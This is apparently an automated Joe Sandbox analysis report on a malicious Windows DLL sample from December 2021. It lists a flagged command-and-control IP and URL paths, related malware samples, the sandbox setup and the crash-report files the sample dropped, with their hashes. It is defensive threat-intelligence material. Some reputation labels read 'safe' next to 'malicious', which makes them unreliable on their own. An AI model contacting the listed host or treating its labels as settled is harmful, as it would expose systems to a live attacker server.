https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRG | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~ | 0% | Avira URL Cloud | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://crl.microsoft%C | 0% | Avira URL Cloud | safe
https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://45.63.5.129/ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRG | rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.m | WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~ | rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://upx.sf.net | Amcache.hve.14.dr | false | | high
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000001B.00000003.1130904279.0000024B21990000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130892648.0000024B2196E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130827300.0000024B219C8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130929870.0000024B21E02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130914623.0000024B219B1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130856335.0000024B219C8000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoft%C | WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
http://help.disneyplus.com. | svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://45.63.5.129/ | rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.63.5.129 | unknown | United States | 20473 | AS-CHOOPAUS | true

                        General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532437
Start date: 02.12.2021
Start time: 09:32:17
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: nhlHEF5IVY (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.evad.winDLL@36/14@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.8% (good quality ratio 20.1%)
• Quality average: 72.7%
• Quality standard deviation: 27.6%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.189.173.22, 20.54.110.249, 40.91.112.76
• Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
09:35:31 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
09:36:50 | API Interceptor | 7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection
45.63.5.129 | IGidwJjoUs.dll | malicious
| efELSMI5R4.dll | malicious

                            Domains

                            No context

                            ASN

Match | Associated Sample Name / URL | Detection | Context
AS-CHOOPAUS | IGidwJjoUs.dll | malicious | 45.63.5.129
| efELSMI5R4.dll | malicious | 45.63.5.129
| ImSL42AOtZ.exe | malicious | 45.63.36.79
| spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
| spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
| iU17wh2uUd.exe | malicious | 149.28.253.196
| iU17wh2uUd.exe | malicious | 149.28.253.196
| Sz4lxTmH7r.exe | malicious | 149.28.253.196
| 7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe | malicious | 149.28.253.196
| RFIlSRQKzj.exe | malicious | 45.32.115.235
| setup_x86_x64_install.exe | malicious | 149.28.253.196
| 991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe | malicious | 149.28.253.196
| MMUc2aeWxZ.exe | malicious | 149.28.253.196
| 0pvsj0MF1D.exe | malicious | 149.28.253.196
| Linux_amd64 | malicious | 45.32.162.141
| nkXzJnW7AH.exe | malicious | 149.28.253.196
| 67MPsax8fd.exe | malicious | 136.244.117.138
| Linux_x86 | malicious | 45.77.44.252
| uI6mJo4TJQ.exe | malicious | 149.28.253.196
| uI6mJo4TJQ.exe | malicious | 149.28.253.196

                            JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | IGidwJjoUs.dll | malicious | 45.63.5.129
| efELSMI5R4.dll | malicious | 45.63.5.129
| TYLNb8VvnmYA.dll | malicious | 45.63.5.129
| 2gyA5uNl6VPQUA.dll | malicious | 45.63.5.129
| spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
| spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
| fehiVK2JSx.dll | malicious | 45.63.5.129
| kQ9HU0gKVH.exe | malicious | 45.63.5.129
| gvtdsqavfej.dll | malicious | 45.63.5.129
| mhOX6jll6x.dll | malicious | 45.63.5.129
| dguQYT8p8j.dll | malicious | 45.63.5.129
| jSxIzXfwc7.dll | malicious | 45.63.5.129
| mhOX6jll6x.dll | malicious | 45.63.5.129
| X2XCewI2Yy.dll | malicious | 45.63.5.129
| dguQYT8p8j.dll | malicious | 45.63.5.129
| date1%3fBNLv65=pAAS.dll | malicious | 45.63.5.129
| HMvjzUYq2h.dll | malicious | 45.63.5.129
| s9BZBDWmi4.dll | malicious | 45.63.5.129
| bFx5bZRC6P.dll | malicious | 45.63.5.129
| c7IUEh66u6.dll | malicious | 45.63.5.129

                            Dropped Files

                            No context

                            Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_88e9c9cb640b4f665f2020b110738337d7578_d70d8aa6_0dacd410\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.675453607447359
Encrypted: false
SSDEEP: 96:0nIzqnZqyBy9hkoyt7Jf0pXIQcQ5c6A2cE2cw33+a+z+HbHg0VG4rmMOyWZAXGnK:TGB+HnM28jjAq/u7sUS274ItW
MD5: 3A677EE5FF88A61E83FF39BC2EC71A32
SHA1: 69009A1B51235712DDE27F921E90522682087661
SHA-256: FCF3EA077E0CA2FD817974948A0776F965C40753CD60EE78AB3DDA9E3DA9E897
SHA-512: E9296B4154255C881D1C6680A2BCA76D121D260B33ED5DA4E8822E54B9081751CA20ADF19F4F858A6CBE601F41A44AF136414803F0D4EBB96CA461C6C3BB74CA
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0ddd14c2\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.6788532132552507
Encrypted: false
SSDEEP: 96:cYFBzqnZqyay9hk1Dg3fWpXIQcQGc6IAPcEEcw3K+a+z+HbHg0VG4rmMOyWZAXGn:hbGBiHoUqusjAq/u7sFS274ItW
MD5: 56EB563C9E449B35D350FE2AF248CE9A
SHA1: C38EA0E32C5EEA438886FF4E4C139591B7B9F6CF
SHA-256: 3527C19D242D4C9E7BB49F8D9260C401183CE11BCF25E068FB423AB104324D32
SHA-512: 8AAF3DA2FB2D55F489E75E3F8F550A8D83328CBFB92EE75768CBF08579639A0FBA3D055EB61962AE4CADC749B5EB12856A99E2D76DF22F1AE35C93B708C78A6E
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DED.tmp.csv
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 50214
Entropy (8bit): 3.055875486247182
Encrypted: false
SSDEEP: 1536:pwH6p8IE6/xpXAziUFNPlBnm53gRdeBRI:pwH6p8IE6/xpXAziUFNPlBnm53gRd2RI
MD5: 75E46292FCCADC990C9FA5B3A85C0945
SHA1: 5BEACAF4AC57E6870DBD8FF13F50FE9336F25F3C
SHA-256: F157465E50F0CE2439B05C9971F264C9D328333B816E06EAA8E23223C832D6DA
SHA-512: B7CE1BE4EB5CB550E820E68BAB8C31E9D460FAEEC989B76D665EC9E63DE88117B39FAFAB8505245A58E14C7B908DB5CB421382F807EA779692E9ECE946343739
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER21A7.tmp.txt
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.6939896893715987
Encrypted: false
SSDEEP: 96:9GiZYWeq9R0hMgYZYhwWpHfYEZ7JtFiK+qg06wrmzsafM5g4WIby3:9jZDeqo+mhKAafM5g4Rby3
MD5: E932573E4009397CB61E58D34441B1C2
SHA1: 7A05D61BEB4D76215B9CD454FD78F83BF7CD242A
SHA-256: 60C2D30B96D4933E45A37C305BE1E3B8E96EAF6167E4083ADCBADF190ED99D4C
SHA-512: 3FA3DBC88EAF915D096AFD06499183B1410FBF00702295C4F57C15D66E9B2B5BEDFB835262B030FB9891207FAD9142F6B9FEF6AEC7E98EAC1DB236CA3AEB7280
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D6B.tmp.csv
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 48936
Entropy (8bit): 3.0567006842183746
Encrypted: false
SSDEEP: 768:GlHvHYzExMQk/xDViwiDGkeFNPy+B0ZHX0rifZpmDBr:GlHvHYkMQk/xDViwi8FNPNB05X0rifZm
MD5: E76247A17721B20740BDA40AA040A387
SHA1: 7778CC792049377FBD219803364A76ABD8DCAC37
SHA-256: D5CD7B4CD2D83DC7286B83FD0647D4089EE2400747B58B3E8AF909DB2A5B3001
SHA-512: 3861F73E98EDFF2C389C004832C8EBB7EC5BC3477DCDFC4D28A2B19B06A63F66FEF40E09DD738988F9A8F23788C4879A1DA76CC66E6A16A9A0E6959A6EB7FAD5
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5183.tmp.txt
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.6948925080297124
Encrypted: false
SSDEEP: 96:9GiZYWb8bUwsXYwYpWuzPHUYEZhstFicqo0EwkNP62a4HUZfz2Ip63:9jZDbfHuzo2C2a4HUZfzxp63
MD5: 1C7D28C39B5399BBA2CF6B665267C802
SHA1: 34E54301F8E0C4E68113718B564301F11167E9D8
SHA-256: BA436F8106626B34FC7FB041110B2193C374A4476ED1E2728D9B71EEE4B92658
SHA-512: 83F2DD4123646429F46B16F209FB92B6CFA68EFD441D2DF29DFE05B2E35F3DDC599B03649A1687B8D6ECECA3CF0046991A8CA39255176C1FFDBE1A8BD7E330D2
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC635.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Thu Dec 2 08:35:11 2021, 0x1205a4 type
Category: dropped
Size (bytes): 27104
Entropy (8bit): 2.4658530463547312
Encrypted: false
SSDEEP: 192:X1BL2dL5rO95u9NfNKPXUyIehkG/F6lvml12g4Ng4g:Hyddy95sKPUyqG96lvml1sg
MD5: 2CFCEBA5F371AD300A27700684018653
SHA1: 216B2E023AF9804E84FC71EA2C1A898624FCC295
SHA-256: 32409DBB688D15145A0A98B56768BEDEACB384B20BD23C3AB2F4DDC100EDE06A
SHA-512: 820DA6A01E046429A38ECF4BBFC5C041C78A95824F74F0C8C123EE46AD7F20C141AA61A016650EF73EB64F88DDDAADB4ADA69447097304A503BBCC58A62F2AFA
Malicious: false
                            Preview: MDMP....... .......?..a............4...............H.......$...........................`.......8...........T...........h...x]...........................................................................................U...........B......p.......GenuineIntelW...........T.............a)............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9C0.tmp.WERInternalMetadata.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8342
                            Entropy (8bit):3.698214122615227
                            Encrypted:false
                            SSDEEP:192:Rrl7r3GLNiOV6C6YrFSUjchBgmfOSzp+pBa89bnBsfsbtm:RrlsNi86C6YJSUjc3gmfOSzcn6fs8
                            MD5:6178E0FBF2CDF76EDE4032E86AD14EEB
                            SHA1:48896B68D9E0D1E6592C2FA85ECC5958B4B35DF2
                            SHA-256:B16E217BF9EB4698D88BE791565706EA199F97974C7B76778857937FB14936F5
                            SHA-512:91EBF567EA4A3717DA13D8F387C477720C78DFE5B3563506E4BCD2A81CC0855960229F55AACBE226822790D4688E66AC992ECDF47355EAFCACC6E3D289296166
                            Malicious:false
                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC80.tmp.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4598
                            Entropy (8bit):4.478592022204378
                            Encrypted:false
                            SSDEEP:48:cvIwSD8zs1JgtWI9ZdWSC8B88fm8M4J2yvZFPf+q84WzQUV5KcQIcQwQVd:uITfPmsSN/JBLfwZ5KkwQVd
                            MD5:B9457C8BE17AF75066A8B71B3FFE00C8
                            SHA1:DC7A1EA785583E751F4FC8AD9C1B24E426CF63F9
                            SHA-256:07B87C80F34C093EC23A4DCE80F5B6EE5FD650F97507A0E2822AB53A5D7B3619
                            SHA-512:DFD08CD7F7B2E287FBD676DD60586519D2CCECEEDAAC14B71A03998D98AC15F878DFAF911DD786BD73C0579214397D2D68E52B761573ECF630BAE42099260EF1
                            Malicious:false
                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279785" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE517.tmp.dmp
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 08:35:19 2021, 0x1205a4 type
                            Category:dropped
                            Size (bytes):1060120
                            Entropy (8bit):1.3642522315586343
                            Encrypted:false
                            SSDEEP:1536:a/LkL9oQsG+rpW8TvEiAMeaQY/0RxaqkFfNkVs+2MTiKvDTKvoumB182rgcqabg7:7o/TvEid/0Rx+nkViQiKfKvoOgLu
                            MD5:682434DD436E41594AE7F91157674BD1
                            SHA1:F0F4452D9203AF9E43711B09C74A9AB983F46870
                            SHA-256:17CC8E7DADBA3690D566BE3FCAB14FE8232FDA69FBF81A8A6D5218D925FFA72B
                            SHA-512:BDDB12CE974AD7D9706C70C9BA6E4EEA319AF1D4FD01C16BC25F731564349F6DC26BE70A08C293247072D166789BAD46832BE355C53A66F838271CE16E59B171
                            Malicious:false
                            Preview: MDMP....... .......G..a............4...............H.......$...........................`.......8...........T...........@.... ...........................................................................................U...........B......p.......GenuineIntelW...........T.............a)............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERECE8.tmp.WERInternalMetadata.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8302
                            Entropy (8bit):3.691376220390357
                            Encrypted:false
                            SSDEEP:192:Rrl7r3GLNiO76J6YrZSUacugmfL8GSaS+pDw89bvBsfiwlm:RrlsNii6J6YVSUacugmfLrSaLv6fiP
                            MD5:702C9D5F1B3A57485DC4AE7CE5AD3532
                            SHA1:403544DB52FFA78BE42CC9617366F41FD3386EA3
                            SHA-256:475FA8D42318476795AC04B906D47D3A428E9E26F6B7092F1AFB6E548A5D49E6
                            SHA-512:EB4BE5DBB79B8BDE881F19F614D6330612521A4BEF4A6BE2B1290BE5DBDF483E116F2C7C4296FF0B77C33E62F434B639B3BB90F44B12FFD758940D268FFC4A69
                            Malicious:false
                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC89.tmp.xml
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4558
                            Entropy (8bit):4.430742492686979
                            Encrypted:false
                            SSDEEP:48:cvIwSD8zsMJgtWI9ZdWSC8BG88fm8M4J2yGtFul+q84tjUUV5KcQIcQwQVd:uITfKmsSNcBJE8xF5KkwQVd
                            MD5:D7E9DD0928ADE04823B4F8488E78A14B
                            SHA1:079936EDB3E48CDA717F26990EBDBFC256C7CDBE
                            SHA-256:38AD0006349046BEF2B76CC25E9201C31BF7ECA22118F3353D5F075B5D1B000C
                            SHA-512:5BA924FAB3A51FD8A1850ECB92C5B5768A94588E1012360A600CDB4ED3ED168AAF5633DA5F17433AC604012F4BC0D61B218F0699577EA96D2250835C242DB6B3
                            Malicious:false
                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279786" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                            C:\Windows\appcompat\Programs\Amcache.hve
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1572864
                            Entropy (8bit):4.2393519795284975
                            Encrypted:false
                            SSDEEP:12288:cjeH0u85YKTfUQ03qU96IObdOdJVDGLatVa8Exn1Q81hDvFP:geH0u85YKTcQ03ynO
                            MD5:A7FC3DF75E5D2FF4F87338A703BDB484
                            SHA1:AEE68E9EB2E62FDCAA0CB6E9129AD0F0BBE6189B
                            SHA-256:3492A6DAF2928F617B32B0C45780D6B76EF1C5C7FD38B22663989C38A2CCF076
                            SHA-512:B221ADAAF6CE67E35AE7A5F7ABDA6F9A835A0BE7AC436149D5D568876BD21C40AB03D85174FCDD2265789556A9FCD666437A143CB8FE90EBCE44885E21EF3D1F
                            Malicious:false
                            Preview: regfI...I...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..^.W.................................................................................................................................................................................................................................................................................................................................................Z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):3.722974081401587
                            Encrypted:false
                            SSDEEP:384:CM95K5Jcv4KgnVVeeDze61NKZtjyT8GRFwxnH:FjKug/eeDzeUNYtjvGRFwx
                            MD5:EAF0C8245DDA6CA5F4FAF8F680FE9CA8
                            SHA1:76AB128762ABF3DEFF9D80A3195F942299454500
                            SHA-256:7EF497A8E323CA0BA65B851FDBFDA5FA55162EFB80C36B655DA1C624D65632C8
                            SHA-512:2DABB328A3206B899F2C6D4D4F728108129CC844460E2011F4AFC13D610E3302D50CDDC70C088DD12A3CBCDB77F3DFF3C9EF940FD6B316157D4F86BB364D9F0A
                            Malicious:false
